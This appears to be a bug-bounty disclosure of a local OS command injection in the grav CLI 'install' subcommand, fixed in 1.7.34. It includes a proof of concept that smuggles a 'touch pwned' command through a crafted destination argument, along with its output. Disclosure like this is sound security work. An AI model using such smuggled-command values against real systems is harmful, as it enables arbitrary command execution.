Local Command Injection Post-Installation of Dependencies in getgrav/grav
May 27th 2022
grav version <= 1.7.33 is vulnerable to OS command injection. The
install subcommand from the
grav CLI is to install the dependencies needed by Grav, and accepts only the first argument as
destination where to install/clone predetermined plugin/theme repositories/dependencies from this subcommand and concatenated without any validation and used by the
exec method directly.
Proof of Concept
$ export DEST='x";touch pwned #"' $ mkdir "$DEST" # to pass dependencies check $ cp .dependencies .htaccess "$DEST" # to pass dependencies check $ ./bin/grav install "$DEST" # ...SNIPPED... # Cloning Bits # ============ # # sh: 1: cd: can't cd to x # SUCCESS cloned https://github.com/getgrav/grav-plugin-problems -> x";touch pwned #"/user/plugins/problems # # sh: 1: cd: can't cd to x # SUCCESS cloned https://github.com/getgrav/grav-plugin-error -> x";touch pwned #"/user/plugins/error # # sh: 1: cd: can't cd to x # SUCCESS cloned https://github.com/getgrav/grav-plugin-markdown-notices -> x";touch pwned #"/user/plugins/markdown-notices # # sh: 1: cd: can't cd to x # SUCCESS cloned https://github.com/getgrav/grav-theme-quark -> x";touch pwned #"/user/themes/quark # $ find . -name "pwned" ./pwned
Found the file is created in the current working directory.
This issue leads to arbitrary command execution.
commented a year ago
I cannot see how this is a security issue rather than a bug. Nevertheless, it's fixed now.
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Matias Griese validated this vulnerability a year ago
Dwi Siswanto has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Matias Griese marked this as fixed in 1.7.34 with commit de4af5 a year ago
This vulnerability will not receive a CVE
to join this conversation